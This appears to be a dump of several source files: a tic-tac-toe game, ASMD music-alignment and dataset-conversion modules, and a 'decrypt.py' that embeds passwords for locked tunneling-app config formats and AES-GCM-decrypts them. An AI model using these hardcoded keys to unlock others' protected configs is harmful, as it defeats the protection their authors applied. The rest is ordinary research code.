    writing the symbol right after it, provided that slot is still a space.
'''
global s, winner
global c
if n != 0:
if c%2==0:
symb='0'
else:
symb='X'
i=s.find(n)
if s[i+1]==' ':
s=s[:i+1]+symb+s[i+2:]
else:
print()
print()
print('!!!!!Already taken!!!!!!')
c-=1
sv=' | | '
sh='-----------'
s3=' {} | {} | {} '.format(s[13],s[15],s[17])
s2=' {} | {} | {} '.format(s[7],s[9],s[11])
s1=' {} | {} | {} '.format(s[1],s[3],s[5])
print(sv)
print(s3)
print(sv)
print(sh)
print(sv)
print(s2)
print(sv)
print(sh)
print(sv)
print(s1)
print(sv)
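    # check the three rows (positions 7-8-9, 4-5-6 and 1-2-3)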
if s[13] == s[15] == s[17] :
if s[13] == 'X':
winner = 2
elif s[13] == '0':
winner = 1
if s[7] == s[9] == s[11] :
if s[7] == 'X':
winner = 2
elif s[7] == '0':
winner = 1
if s[3] == s[5] == s[1] :
if s[1] == 'X':
winner = 2
elif s[1] == '0':
winner = 1
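    # check the two diagonals (7-5-3 and 1-5-9)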
if s[13] == s[9] == s[5] :
if s[13] == 'X':
winner = 2
elif s[13] == '0':
winner = 1
if s[1] == s[9] == s[17] :
if s[1] == 'X':
winner = 2
elif s[1] == '0':
winner = 1
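    # check the three columns (1-4-7, 2-5-8 and 3-6-9)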
if s[1] == s[13] == s[7] :
if s[1] == 'X':
winner = 2
elif s[1] == '0':
winner = 1
if s[3] == s[9] == s[15] :
if s[3] == 'X':
winner = 2
elif s[3] == '0':
winner = 1
if s[11] == s[5] == s[17] :
if s[11] == 'X':
winner = 2
elif s[11] == '0':
winner = 1
ans=['y']
if ' ' not in [s[1], s[3], s[5], s[7], s[9], s[11], s[13], s[15], s[17]]:
ans = ['n']
return ans
if __name__=='__main__':
ans=['y']
os.system('clear')
printboard(0)
while ans==['y']:
n=input('Choose your next position (1-9) player {} :'.format((c%2)+1))
os.system('clear')
ans=printboard(n)
if winner != -1:
break
c+=1
if winner != -1:
print('WINNER IS PLAYER:'+str(winner))
else:
print('DRAW!!!')
``` |
{
"source": "00sanoj00/Unlocker",
"score": 2
} |
#### File: 00sanoj00/Unlocker/decrypt.py
```python
from sys import stdin, stdout, stderr
from argparse import ArgumentParser
from pathlib import Path
from base64 import b64decode
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto.Util.Padding import unpad
DEFAULT_FILE_EXTENSION = '.tmt'
# passwords to derive the key from
PASSWORDS = {
'.tut': b'<PASSWORD>',
'.sks': b'<PASSWORD>!!',
'.cyh': b'dyv35182!',
'.sex': b'dYv35224nossas!.',
'.tmt': b'<PASSWORD>',
}
# some utility functions
def error(error_msg = 'Corrupted/unsupported file.'):
stderr.write(f'\033[41m\033[30m X \033[0m {error_msg}\n')
stderr.flush()
exit(1)
def warn(warn_msg):
stderr.write(f'\033[43m\033[30m ! \033[0m {warn_msg}\n')
stderr.flush()
def ask(prompt):
stderr.write(f'\033[104m\033[30m ? \033[0m {prompt} ')
stderr.flush()
return input()
def human_bool_to_bool(human_bool):
return 'y' in human_bool
def main():
# parse arguments
parser = ArgumentParser()
parser.add_argument('file', help='file to decrypt')
output_args = parser.add_mutually_exclusive_group()
output_args.add_argument('--output', '-o', help='file to output to')
output_args.add_argument('--stdout', '-O', action='store_true', help='output to stdout', default=True)
args = parser.parse_args()
# open file
encrypted_contents = open(args.file, 'r').read()
# determine the file's extension
file_ext = Path(args.file).suffix
if file_ext not in PASSWORDS:
warn(f'Unknown file extension, defaulting to {DEFAULT_FILE_EXTENSION}')
file_ext = DEFAULT_FILE_EXTENSION
# split the file
split_base64_contents = encrypted_contents.split('.')
if len(split_base64_contents) != 3:
raise ValueError('Unsupported file.')
split_contents = list(map(b64decode, split_base64_contents))
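    # the three dot-separated parts are: [0] the PBKDF2 salt, [1] the AES-GCM
    # nonce, and [2] the ciphertext with the 16-byte authentication tag appended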
# derive the key
decryption_key = PBKDF2(PASSWORDS[file_ext], split_contents[0], hmac_hash_module=SHA256)
# decrypt the file
cipher = AES.new(decryption_key, AES.MODE_GCM, nonce=split_contents[1])
decrypted_contents = cipher.decrypt_and_verify(split_contents[2][:-16], split_contents[2][-16:])
# decide where to write contents
if args.output:
output_file_path = Path(args.output)
# check if the file exists
if output_file_path.exists() and output_file_path.is_file():
# check if the user agrees to overwrite it
if not human_bool_to_bool(ask(f'A file named "{args.output}" already exists. Overwrite it? (y/n)')):
# if user doesn't, quit
exit(0)
# write the contents to the file
output_file = open(output_file_path, 'wb')
output_file.write(decrypted_contents)
elif args.stdout:
# convert the config to UTF-8
config = decrypted_contents.decode('utf-8')
# write it to stdout
stdout.write(config)
stdout.flush()
if __name__ == '__main__':
try:
main()
except Exception as err:
error(err)
``` |
{
"source": "00sapo/ASMD",
"score": 2
} |
#### File: ASMD/asmd/alignment_stats.py
```python
import os
import os.path
import pickle
import random
from copy import deepcopy
from random import choices, uniform
from typing import List, Tuple
import numpy as np
from hmmlearn.hmm import GMMHMM
from sklearn.preprocessing import StandardScaler, minmax_scale
from .asmd import Dataset
from .conversion_tool import fix_offsets
from .dataset_utils import choice, filter, get_score_mat, union
from .eita.alignment_eita import get_matching_notes
from .idiot import THISDIR
from .utils import mat_stretch
NJOBS = -1
FILE_STATS = os.path.join(THISDIR, "_alignment_stats.pkl")
# TODO: refactoring: most of the stuffs are repeated twice for onsets and durations
class Stats(object):
def __init__(self,
ons_dev_max=0.2,
dur_dev_max=0.2,
mean_max_ons=None,
mean_max_dur=None):
self.dur_ratios = []
self.ons_diffs = []
self.ons_lengths = []
self.dur_lengths = []
self.means_ons = []
self.means_dur = []
self.ons_dev = []
self.dur_dev = []
self.ons_dev_max = ons_dev_max
self.dur_dev_max = dur_dev_max
self.mean_max_ons = mean_max_ons
self.mean_max_dur = mean_max_dur
self._song_duration_dev = 1
self._song_onset_dev = 1
self._song_mean_ons = 0
self._song_mean_dur = 0
self._seed = 1992
def seed(self):
"""
        Calls `seed` on python `random` and then increments its own seed by one
"""
random.seed(self._seed)
self._seed += 1
return self._seed
def add_data_to_histograms(self, ons_diffs, dur_ratios):
"""
        Add data for one song; the histograms still have to be computed
        afterwards (see `train_on_filled_stats`)
"""
self.ons_dev.append(np.std(ons_diffs))
self.dur_dev.append(np.std(dur_ratios))
self.means_ons.append(np.mean(ons_diffs))
self.means_dur.append(np.mean(dur_ratios))
self.ons_diffs += StandardScaler().fit_transform(
ons_diffs.reshape(-1, 1)).tolist()
self.dur_ratios += StandardScaler().fit_transform(
dur_ratios.reshape(-1, 1)).tolist()
self.ons_lengths.append(len(ons_diffs))
self.dur_lengths.append(len(dur_ratios))
def get_random_onset_dev(self, k=1):
self.seed()
return _get_random_value_from_hist(self.ons_dev_hist,
k,
max_value=self.ons_dev_max)
def get_random_duration_dev(self, k=1):
self.seed()
return _get_random_value_from_hist(self.dur_dev_hist,
k,
max_value=self.dur_dev_max)
def get_random_mean_ons(self, k=1):
self.seed()
return _get_random_value_from_hist(self.means_hist_ons,
k,
max_value=self.mean_max_ons)
def get_random_mean_dur(self, k=1):
self.seed()
return _get_random_value_from_hist(self.means_hist_dur,
k,
max_value=self.mean_max_dur)
def new_song(self):
"""
Prepare this object for a new song
"""
self.seed()
self._song_duration_dev = self.get_random_duration_dev()
self.seed()
self._song_onset_dev = self.get_random_onset_dev()
self.seed()
self._song_mean_ons = self.get_random_mean_ons()
self._song_mean_dur = self.get_random_mean_dur()
def fill_stats(self, dataset: Dataset):
"""
        Fills this object with data from `dataset`
"""
global process_
def process_(i, dataset):
try:
score, aligned = get_matching_scores(dataset, i)
except RuntimeError:
# skipping if we cannot match the notes for this score
return None
# computing diffs
ons_diffs = score[:, 1] - aligned[:, 1]
dur_ratios = (aligned[:, 2] - aligned[:, 1]) / (score[:, 2] -
score[:, 1])
return ons_diffs, dur_ratios
# puts in `self._data` onset and duration diffs
self._data = dataset.parallel(
process_, # type: ignore
n_jobs=NJOBS,
backend="multiprocessing")
count = 0
for res in self._data:
if res is not None:
count += 1
ons_diffs, dur_ratios = res
self.add_data_to_histograms(ons_diffs, dur_ratios)
print(
f"Using {count / len(self._data):.2f} songs ({count} / {len(self._data)})"
)
def get_random_durations(self, aligned_dur):
aligned_dur = np.asarray(aligned_dur)
self.seed()
new_dur_ratio = self.get_random_duration_ratio(
k=len(aligned_dur)) * self._song_duration_dev + self._song_mean_dur
return aligned_dur / np.abs(new_dur_ratio)
def get_random_onsets(self, aligned):
aligned = np.asarray(aligned)
self.seed()
new_ons_diff = self.get_random_onset_diff(
k=len(aligned)) * self._song_onset_dev + self._song_mean_ons
new_ons = np.sort(aligned + new_ons_diff)
new_ons -= new_ons.min()
return new_ons
def get_random_offsets(self, aligned_ons, aligned_offs, new_ons):
aligned_ons = np.asarray(aligned_ons)
aligned_offs = np.asarray(aligned_offs)
new_ons = np.asarray(new_ons)
new_dur = self.get_random_durations(aligned_offs - aligned_ons)
return new_ons + new_dur
def get_random_onset_diff(self, k=1):
pass
def get_random_duration_ratio(self, k=1):
pass
def train_on_filled_stats(self):
"""
Compute all the histograms in tuples (histogram, bin_edges):
        self.means_hist_ons
        self.means_hist_dur
        self.ons_dev_hist
        self.dur_dev_hist
"""
self.means_hist_ons = np.histogram(self.means_ons,
bins='auto',
density=True)
self.means_hist_dur = np.histogram(self.means_dur,
bins='auto',
density=True)
self.ons_dev_hist = np.histogram(self.ons_dev,
bins='auto',
density=True)
self.dur_dev_hist = np.histogram(self.dur_dev,
bins='auto',
density=True)
class HistStats(Stats):
def __init__(self, ons_max=None, dur_max=None, stats: Stats = None):
super().__init__()
if stats:
self.__dict__.update(deepcopy(stats.__dict__))
self.ons_max = ons_max
self.dur_max = dur_max
def train_on_filled_stats(self):
super().train_on_filled_stats()
# computing onset and duration histograms
self.ons_hist = np.histogram(self.ons_diffs, bins='auto', density=True)
self.dur_hist = np.histogram(self.dur_ratios,
bins='auto',
density=True)
def get_random_onset_diff(self, k=1):
self.seed()
return _get_random_value_from_hist(self.ons_hist,
k,
max_value=self.ons_max)
def get_random_duration_ratio(self, k=1):
self.seed()
return _get_random_value_from_hist(self.dur_hist,
k,
max_value=self.dur_max)
def __repr__(self):
return str(type(self))
class HMMStats(Stats):
def __init__(self, stats: Stats = None):
super().__init__()
if stats:
self.__dict__.update(deepcopy(stats.__dict__))
n_iter = 100 # maximum number of iterations
tol = 0.1 # minimum value of log-likelyhood
covariance_type = 'diag'
self.onshmm = GMMHMM(
            n_components=20,  # the number of hidden states
            n_mix=30,  # the number of Gaussian mixture components per state
covariance_type=covariance_type,
n_iter=n_iter,
tol=tol,
verbose=True,
random_state=self.seed())
self.durhmm = GMMHMM(
n_components=2,
n_mix=3,
covariance_type=covariance_type,
n_iter=n_iter,
tol=tol,
verbose=True,
random_state=self.seed())
def get_random_onset_diff(self, k=1):
x, _state_seq = self.onshmm.sample(k, random_state=self.seed())
return x[:, 0]
def get_random_duration_ratio(self, k=1):
x, _state_seq = self.durhmm.sample(k, random_state=self.seed())
return x[:, 0]
def train_on_filled_stats(self):
super().train_on_filled_stats()
# train the hmms
def train(hmm, data, lengths):
hmm.fit(data, lengths)
if (hmm.monitor_.converged):
print("hmm converged!")
else:
print("hmm did not converge!")
print("Training duration hmm...")
train(self.durhmm, self.dur_ratios, self.dur_lengths)
print("Training onset hmm...")
train(self.onshmm, self.ons_diffs, self.ons_lengths)
def __repr__(self):
return str(type(self))
def get_matching_scores(dataset: Dataset,
i: int) -> Tuple[np.ndarray, np.ndarray]:
"""
    Get sub-scores of matching notes between `score` and the most precisely
    aligned data available for song at index `i`
    Returns score, aligned
"""
mat_aligned = get_score_mat(
dataset, i, score_type=['precise_alignment', 'broad_alignment'])
mat_score = get_score_mat(dataset, i, score_type=['score'])
# stretch to the same average BPM
mat_stretch(mat_score, mat_aligned)
# changing float pitches to nearest pitch
mat_aligned[:, 0] = np.round(mat_aligned[:, 0])
mat_score[:, 0] = np.round(mat_score[:, 0])
# apply Eita method
matching_notes = get_matching_notes(mat_score, mat_aligned, timeout=20)
if matching_notes is None:
raise RuntimeError("Cannot match notes for this score!")
return mat_score[matching_notes[:, 0]], mat_aligned[matching_notes[:, 1]]
def _get_random_value_from_hist(hist, k=1, max_value=None, hmm=False):
"""
Given a histogram (tuple returned by np.histogram), returns a random value
picked with uniform distribution from a bin of the histogram. The bin is
picked following the histogram distribution. If `max` is specified, the
histogram is first normalized so that the maximum absolute value is the one
specified.
"""
if max_value:
values = minmax_scale(hist[1], (-abs(max_value), abs(max_value)))
else:
values = hist[1]
start = choices(values[:-1], weights=hist[0], k=k)
bin_w = abs(values[1] - values[0])
end = np.array(start) + bin_w
return np.asarray([uniform(start[i], end[i]) for i in range(len(start))])
def evaluate(dataset: Dataset, stats: List[Stats]):
"""
    Computes classical DTW over all datasets and returns average and standard
deviation of all the DTW distances for each `Stats` object in stats
This function will also need to install the dtw-python module separately
"""
global process_
def process_(i: int, dataset: Dataset, stat: Stats):
# reset the stats for a new song
stat.new_song()
try:
# take the matching notes in the score
score, aligned = get_matching_scores(dataset, i)
except RuntimeError:
# skipping if cannot match notes
return -1, -1
# take random standardized differences
aligned_diff = stat.get_random_onset_diff(k=score.shape[0])
song_ons_diff = score[:, 1] - aligned[:, 1]
        # computing mean and std dev from the matching notes
mean = np.mean(song_ons_diff)
std = np.std(song_ons_diff)
# computing the estimated ons
ons = np.sort(aligned[:, 1] + aligned_diff * std + mean)
        # computing estimated offs
dur_ratios = stat.get_random_duration_ratio(k=score.shape[0])
song_dur = (aligned[:, 2] - aligned[:, 1])
song_dur_ratio = song_dur / (score[:, 2] - score[:, 1])
        # computing mean and std dev from the matching notes
mean = np.mean(song_dur_ratio)
std = np.std(song_dur_ratio)
# computing the estimated offs
est_ratios = dur_ratios * std + mean
new_dur = song_dur / est_ratios
offs = ons + new_dur
fix_offsets(ons, offs, score[:, 0])
        # mean absolute distance between the score and the affinely transformed new times
offs_dist = np.abs(offs - score[:, 2]).mean()
ons_dist = np.abs(ons - score[:, 1]).mean()
return ons_dist, offs_dist
for stat in stats:
print(f"Evaluating {stat}")
distances = dataset.parallel(
process_, # type: ignore
stat,
n_jobs=NJOBS,
max_nbytes=None,
backend="multiprocessing")
# removing scores where we couldn't match notes
distances = np.asarray(distances)
valid_scores = np.count_nonzero(distances[:, 0] > 0)
print(
f"Used {valid_scores / len(dataset)} scores ({valid_scores} / {len(dataset)})"
)
distances = distances[distances[:, 0] >= 0]
print(f"Statics for {stat} and Onsets")
print(f"Avg: {np.mean(distances[:, 0]):.2e}")
print(f"Std {np.std(distances[:, 0]):.2e}")
print(f"Statics for {stat} and Offsets")
print(f"Avg: {np.mean(distances[:, 1]):.2e}")
print(f"Std {np.std(distances[:, 1]):.2e}")
def get_stats(method='histogram', save=True, train=True):
"""
Computes statistics, histogram, dumps the object to file and returns it
"""
if os.path.exists(FILE_STATS):
return pickle.load(open(os.path.join(FILE_STATS), "rb"))
elif train:
dataset = _get_dataset()
print("Computing statistics")
stats = Stats()
stats.fill_stats(dataset)
return _train_model(stats, method, save)
else:
return None
def _get_dataset():
dataset = Dataset()
# dataset = filter(dataset,
# datasets=['Bach10', 'traditional_flute', 'MusicNet'],
# copy=True)
dataset = union(
filter(dataset,
datasets=[
'vienna_corpus', 'Bach10', 'traditional_flute', 'MusicNet'
],
copy=True),
filter(dataset, datasets=['Maestro'], groups=['asap'], copy=True))
return dataset
def _train_model(stats: Stats, method: str, save: bool):
if method == 'histogram':
stats = HistStats(stats=stats)
elif method == 'hmm':
stats = HMMStats(stats=stats)
stats.train_on_filled_stats()
if save:
print("Saving statistical model")
if os.path.exists(FILE_STATS):
os.remove(FILE_STATS)
pickle.dump(stats, open(FILE_STATS, 'wb'))
return stats
if __name__ == '__main__':
dataset = _get_dataset()
print("Computing statistics")
stats = Stats()
trainset, testset = choice(dataset,
p=[0.7, 0.3],
random_state=stats.seed())
stats.fill_stats(trainset)
for method in ['hmm', 'histogram']:
model = _train_model(stats, method, False)
# stat = pickle.load(
# open(os.path.join(THISDIR, "_alignment_stats.pkl"), "rb"))
evaluate(testset, [
model,
])
```
#### File: ASMD/asmd/asap.py
```python
import argparse
import csv
import json
import tempfile
import zipfile
from pathlib import Path
from typing import List, Mapping, Set, Tuple
from urllib.request import urlretrieve, urlcleanup
from alive_progress import alive_bar
import shutil
from .asmd import Dataset
from .dataset_utils import filter
from .idiot import THISDIR
ASAP_URL = "https://github.com/fosfrancesco/asap-dataset/archive/v1.1.zip"
def modify_maestro_definifion(index: List[Tuple[Path, Path]]) -> Mapping:
"""
This function was run only once to add the proper group `asap` to the
`Maestro` dataset
"""
    # create a dataset for loading the Maestro definition
dataset = Dataset()
for definition in dataset.datasets:
if definition['name'] == 'Maestro':
break
# convert index to Set of string for faster search (the `in` operation)
_index: List[str] = [str(e[0]) for e in index]
install_dir = Path(dataset.install_dir)
# add `asap` to each song with ground_truth in the index
for song in definition['songs']:
path = str((install_dir / song['recording']['path'][0]).with_suffix(''))
if path in _index:
song['groups'].append("asap")
del song['included']
del definition['included']
return definition
def download_asap() -> tempfile.TemporaryDirectory:
"""
Download ASAP from github. return the Path to the downloaded dir
"""
# downloading
print("Downloading ASAP")
asap_dir = tempfile.TemporaryDirectory()
with alive_bar(unknown='notes2', spinner='notes_scrolling') as bar:
temp_fn, _header = urlretrieve(ASAP_URL,
reporthook=lambda x, y, z: bar)
print("Uncompressing ASAP")
with zipfile.ZipFile(temp_fn, 'r') as zip_ref:
zip_ref.extractall(str(asap_dir))
urlcleanup()
return asap_dir
def make_index(asap_path: Path) -> List[Tuple[Path, Path]]:
"""
Generate a list of tuples with values:
Maestro midi paths, ASAP midi score path
"""
# a random path inside asmd
dataset = Dataset()
asmd_maestro_random_path = filter(dataset,
datasets=['Maestro']).get_gts_paths(0)[0]
# the second occurrence of `/` in the random path
_idx = asmd_maestro_random_path.index('/',
asmd_maestro_random_path.index('/') + 1)
# construct path to asmd Maestro
asmd_maestro = Path(dataset.install_dir) / asmd_maestro_random_path[:_idx]
out: List[Tuple[Path, Path]] = []
    # this glob allows abstracting over directory structure and names
for fname in asap_path.glob('**/metadata.csv'):
with open(fname) as f:
for row in csv.DictReader(f):
maestro_path = row['maestro_midi_performance']
if maestro_path:
out.append(
(Path(maestro_path.replace('{maestro}',
str(asmd_maestro))).with_suffix(''),
fname.parent / row['midi_score']))
return out
def copy_scores(index: List[Tuple[Path, Path]]):
"""
    Copies the scores in `index` next to the corresponding Maestro files, using
    the `.score.mid` extension
    """
    # copying files
for maestro, asap in index:
shutil.copy(asap, maestro.with_suffix('.score.mid'))
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument("-m", "--modify", action='store_true')
args = argparser.parse_args()
asap_dir = download_asap()
try:
index = make_index(Path(str(asap_dir)))
if args.modify:
new_def = modify_maestro_definifion(index)
json.dump(new_def,
open(Path(THISDIR) / 'definitions' / 'Maestro.json', 'wt'), indent=4)
else:
copy_scores(index)
finally:
shutil.rmtree(Path(str(asap_dir)).parent.parent)
```
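The index built by `make_index` pairs each ASAP `midi_score` with the corresponding Maestro performance after expanding the `{maestro}` placeholder found in `metadata.csv` and dropping the file extension. The sketch below is an editor's illustration of that rewriting step with invented paths; it is not part of the ASAP or ASMD code.

```python
from pathlib import Path

# Hypothetical values standing in for ASMD's install dir and one metadata.csv row
asmd_maestro = Path("/data/asmd/Maestro")
metadata_dir = Path("/data/asap/Bach/Prelude/bwv_846")
row = {
    "maestro_midi_performance": "{maestro}/2009/MIDI-Unprocessed_01.midi",
    "midi_score": "midi_score.mid",
}

# Same rewriting performed inside make_index(): expand the placeholder and
# strip the suffix so the path can be matched against ASMD ground-truth paths
maestro = Path(
    row["maestro_midi_performance"].replace("{maestro}", str(asmd_maestro))
).with_suffix("")
score = metadata_dir / row["midi_score"]

print(maestro)  # /data/asmd/Maestro/2009/MIDI-Unprocessed_01
print(score)    # /data/asap/Bach/Prelude/bwv_846/midi_score.mid
```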
#### File: ASMD/asmd/convert_from_file.py
```python
import csv
import os
import re
from copy import deepcopy
from functools import wraps
import numpy as np
import pretty_midi
import scipy.io
from . import utils
def convert(exts, no_dot=True, remove_player=False):
"""
This function is designed to be used as decorators for functions which
converts from a filetype to our JSON format.
Example of usage:
>>> @convert(['.myext'], no_dot=True, remove_player=False)
... def function_which_converts(...):
... pass
Parameters
---
* ext : list of str
the possible extensions of the ground-truths to be converted, e.g.
['.mid', '.midi']. You can also use this parameter to remove exceeding
parts at the end of the filename (see `from_bach10_mat` and
`from_bach10_f0` source code)
* no_dot : boolean
if True, don't add a dot before of the extension, if False, add it
if not present; this is useful if you are using the extension to remove
other parts in the file name (see `ext`).
* remove_player : boolean
if True, remove the name of the player in the last part of the file
name: use this for the `traditional_flute` dataset; it will remove the
part after the last '_'.
"""
def _convert(user_convert):
@wraps(user_convert)
def func(input_fn, *args, **kwargs):
for ext in exts:
new_fn = change_ext(input_fn, ext, no_dot, remove_player)
if os.path.exists(new_fn):
break
out = user_convert(new_fn, *args, **kwargs)
if type(out) is dict:
out = [out]
return out
return func
return _convert
prototype_gt = {
"precise_alignment": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"misaligned": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"score": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": [],
"beats": []
},
"broad_alignment": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"missing": [],
"extra": [],
"f0": [],
"soft": {
"values": [],
"times": []
},
"sostenuto": {
"values": [],
"times": []
},
"sustain": {
"values": [],
"times": []
},
"instrument": 255,
}
"""
The dictionary prototype for containing the ground_truth.
use:
>>> from copy import deepcopy
... from convert_from_file import prototype_gt
... prototype_gt = deepcopy(prototype_gt)
>>> prototype_gt
{
"precise_alignment": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"misaligned": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"score": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": [],
"beats": []
},
"broad_alignment": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"f0": [],
"soft": {
"values": [],
"times": []
},
"sostenuto": {
"values": [],
"times": []
},
"sustain": {
"values": [],
"times": []
},
"instrument": 255,
}
Note: ``pitches``, ``velocities``, ``sustain``, ``sostenuto``, ``soft``, and
(if available) ``instrument`` must be in range [0, 128)
"""
def change_ext(input_fn, new_ext, no_dot=False, remove_player=False):
"""
Return the input path `input_fn` with `new_ext` as extension and the part
after the last '-' removed.
    If `no_dot` is True, it will not add a dot before the extension,
    otherwise it will add it if not present.
    `remove_player` can be used to remove the name of the player in the last
    part of the file name: use this for the `traditional_flute` dataset;
    it will remove the last part after '_'.
"""
root = input_fn[:input_fn.rfind('-')]
if remove_player:
root = root[:root.rfind('_')]
if not new_ext.startswith('.'):
if not no_dot:
new_ext = '.' + new_ext
return root + new_ext
def _sort_lists(*lists):
"""
Sort multiple lists in-place with reference to the first one
"""
idx = list(range(len(lists[0])))
idx.sort(key=lists[0].__getitem__)
for i in range(len(lists)):
if len(lists[i]) > 0:
lists[i][:] = map(lists[i].__getitem__, idx)
def _sort_alignment(alignment, data):
"""
Sort `data` in `alignment` (in-place)
"""
_sort_lists(data[alignment]['onsets'], data[alignment]['pitches'],
data[alignment]['offsets'], data[alignment]['velocities'],
data[alignment]['notes'])
def _sort_pedal(data):
"""
Sort pedal for `data` (in-place)
"""
for cc_name in ['soft', 'sustain', 'sostenuto']:
_sort_lists(data[cc_name]['times'], data[cc_name]['values'])
def from_midi(midi_fn,
alignment='precise_alignment',
pitches=True,
velocities=True,
merge=True,
beats=False):
"""
Open a midi file `midi_fn` and convert it to our ground_truth
representation. This fills velocities, pitches, beats, sustain, soft,
sostenuto and alignment (default: `precise_alignment`). Returns a list
containing a dictionary. `alignment` can also be `None` or `False`, in that
case no alignment is filled. If `merge` is True, the returned list will
contain a dictionary for each track. Beats are filled according to tempo
changes.
    This function is decorated with 3 different sets of parameters:
* `from_midi` is the decorated version with `remove_player=False`
* `from_midi_remove_player` is the decorated version with
`remove_player=True`
    * `from_midi_asap` is the decorated version which accepts the extension
      '.score.mid', used by the script that imports scores from ASAP
N.B. To allow having some annotation for subgroups of a dataset, this
function returns None when it cannot find the specified midi file; in this
way, that file is not taken into account while merging the various
annotations (e.g. asap group inside Maestro dataset)
"""
try:
pm = pretty_midi.PrettyMIDI(midi_fn)
except FileNotFoundError:
return None
out = list()
if merge:
data = deepcopy(prototype_gt)
for track in pm.instruments:
if not merge:
data = deepcopy(prototype_gt)
for cc in track.control_changes:
if cc.number == 64:
cc_name = 'sustain'
elif cc.number == 66:
cc_name = 'sostenuto'
elif cc.number == 67:
cc_name = 'soft'
else:
continue
data[cc_name]['values'].append(cc.value)
data[cc_name]['times'].append(cc.time)
for note in track.notes:
if pitches:
data[alignment]["pitches"].append(note.pitch)
if velocities:
data[alignment]["velocities"].append(note.velocity)
if alignment:
data[alignment]["onsets"].append(float(note.start))
data[alignment]["offsets"].append(float(note.end))
if beats and alignment == 'score':
data[alignment]["beats"] = sorted(pm.get_beats().tolist())
if not merge:
_sort_pedal(data)
_sort_alignment(alignment, data)
out.append(data)
if merge:
_sort_pedal(data)
_sort_alignment(alignment, data)
out.append(data)
return out
from_midi_remove_player = convert(['.mid', '.midi'],
remove_player=True)(from_midi)
from_midi_asap = convert(['.score.mid'], remove_player=False)(from_midi)
# N.B. this one must be the last one, otherwise the previous modify the already decorated function!
from_midi = convert(['.mid', '.midi'], remove_player=False)(from_midi)
@convert(['.txt'])
def from_phenicx_txt(txt_fn):
"""
Open a txt file `txt_fn` in the PHENICX format and convert it to our
ground_truth representation. This fills: `broad_alignment`.
"""
out_list = list()
with open(txt_fn) as f:
lines = f.readlines()
out = deepcopy(prototype_gt)
for line in lines:
fields = re.split(',|\n', line)
out["broad_alignment"]["notes"].append(fields[2])
out["broad_alignment"]["pitches"].append(
pretty_midi.note_name_to_number(fields[2]))
out["broad_alignment"]["onsets"].append(float(fields[0]))
out["broad_alignment"]["offsets"].append(float(fields[1]))
_sort_alignment("broad_alignment", out)
out_list.append(out)
return out_list
@convert(['-GTNotes.mat'], no_dot=True)
def from_bach10_mat(mat_fn, sources=range(4)):
"""
    Open a MATLAB mat file `mat_fn` in the MIREX format (Bach10) and convert
    it to our ground_truth representation. This fills: `precise_alignment`,
    `pitches`.
`sources` is an iterable containing the indices of the sources to be
considered, where the first source is 0. Returns a list of dictionary, one
per source.
"""
out_list = list()
mat = scipy.io.loadmat(mat_fn)['GTNotes']
for i in range(len(mat)):
out = deepcopy(prototype_gt)
source = mat[i, 0]
for j in range(len(source)):
note = source[j, 0]
out["precise_alignment"]["pitches"].append(
np.median(np.rint(note[1, :])))
out["precise_alignment"]["onsets"].append(
(note[0, 0] - 2) * 10 / 1000.)
out["precise_alignment"]["offsets"].append(
(note[0, -1] - 2) * 10 / 1000.)
_sort_alignment("precise_alignment", out)
out_list.append(out)
return out_list
@convert(['-GTF0s.mat'], no_dot=True)
def from_bach10_f0(nmat_fn, sources=range(4)):
"""
Open a matlab mat file `nmat_fn` in the MIREX format (Bach10) for frame
evaluation and convert it to our ground_truth representation. This fills:
`f0`. `sources` is an iterable containing the indices of the sources to
be considered, where the first source is 0. Returns a list of dictionary,
one per source.
"""
out_list = list()
f0s = scipy.io.loadmat(nmat_fn)['GTF0s']
for source in sources:
out = deepcopy(prototype_gt)
out["f0"] = f0s[source].tolist()
out_list.append(out)
return out_list
@convert(['.csv'])
def from_musicnet_csv(csv_fn, sr=44100.0):
"""
Open a csv file `csv_fn` and convert it to our ground_truth representation.
This fills: `broad_alignment`, `score`, `pitches`.
    This returns a list containing only one dict. `sr` is the samplerate of the
    audio files (the MusicNet csv contains the sample numbers of the onsets and
    offsets of each note) and it should be a float.
    N.B. MusicNet contains wav files with a samplerate of 44100 Hz.
    N.B. The lowest pitch in MusicNet is 21, so we assume that they count
    pitches starting from 0 as in the midi.org standard.
N.B. `score` times are provided with BPM 60 for all the scores
"""
data = csv.reader(open(csv_fn), delimiter=',')
out = deepcopy(prototype_gt)
# skipping first line
next(data)
for row in data:
        # converting everything to float, except the last one, which is the
        # duration name as a string
row = list(map(float, row[:-1]))
out["broad_alignment"]["onsets"].append(int(row[0]) / sr)
out["broad_alignment"]["offsets"].append(int(row[1]) / sr)
out["instrument"] = int(row[2])
out["broad_alignment"]["pitches"].append(int(row[3]))
out["score"]["pitches"].append(int(row[3]))
out["score"]["onsets"].append(float(row[4]))
out["score"]["offsets"].append(float(row[4]) + float(row[5]))
out["score"]["beats"] = [
i for i in range(int(max(out["score"]["offsets"])) + 1)
]
_sort_alignment('score', out)
_sort_alignment('broad_alignment', out)
return out
@convert(['.gt'])
def from_sonic_visualizer(gt_fn, alignment='precise_alignment'):
"""
    Takes the filename of a Sonic Visualiser output file exported as 'csv' and
    fills the specified `alignment`
"""
min_midi_freq = utils.midi_pitch_to_f0(0)
data = csv.reader(open(gt_fn), delimiter=',')
out = deepcopy(prototype_gt)
for row in data:
p = float(row[1])
if p < min_midi_freq:
continue
out[alignment]["onsets"].append(float(row[0]))
out[alignment]["offsets"].append(float(row[0]) + float(row[2]))
pitch = utils.f0_to_midi_pitch(p)
out[alignment]["pitches"].append(pitch)
_sort_alignment(alignment, out)
return out
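# ---------------------------------------------------------------------------
# Editor's sketch (not part of the original module): a self-contained
# illustration of the extension-swapping decorator pattern implemented by
# `convert` above. The names `with_extensions` and `load_ground_truth` are
# hypothetical and exist only in this sketch.
def _sketch_convert_pattern():
    import os
    from functools import wraps

    def with_extensions(exts):
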